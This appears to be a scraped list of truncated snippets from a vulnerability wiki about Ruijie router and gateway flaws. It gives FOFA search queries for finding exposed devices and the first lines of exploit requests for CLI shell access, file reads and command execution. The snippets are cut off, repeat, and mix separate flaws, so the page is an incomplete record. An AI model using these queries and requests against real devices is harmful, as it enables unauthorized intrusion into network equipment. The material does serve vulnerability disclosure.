锐捷NBR 1300G路由器 越权CLI命令执行漏洞
免费、自由、人人可编辑的漏洞库--pwnwiki.com , Contents 1 FOFA 2 Request 3 POC 4 参考 FOFA title="锐捷网络 --NBR路由器--登录界面" Request POST /WEB_V ...
免费、自由、人人可编辑的漏洞库--pwnwiki.com , Contents 1 FOFA 2 Request 3 POC 4 参考 FOFA title="锐捷网络 --NBR路由器--登录界面" Request POST /WEB_V ...
免费、自由、人人可编辑的漏洞库--pwnwiki.com , 漏洞利用 发送以下请求: POST /login.php HTTP/1.1 Host: User-Agent: Go-http-client/1.1 Content-Length ...
免费、自由、人人可编辑的漏洞库 , Contents 1 FOFA 2 Payload 3 POC 4 参考 FOFA app="Ruijie-EG易网关" Payload /download.php?a=read_txt&file ...
免费、自由、人人可编辑的漏洞库 , 漏洞利用 发送以下请求: POST /cli.php?a=shell HTTP/1.1 Host: User-Agent: Go-http-client/1.1 Content-Length: 24 Co ...
免费、自由、人人可编辑的漏洞库 , Contents 1 FOFA 2 漏洞利用 3 POC 4 参考 FOFA "酒店宽带运营" 漏洞利用 GET传入 $ip参数 后直接命令执行,并且文件无权限要求 请求包为: GET /manager/ ...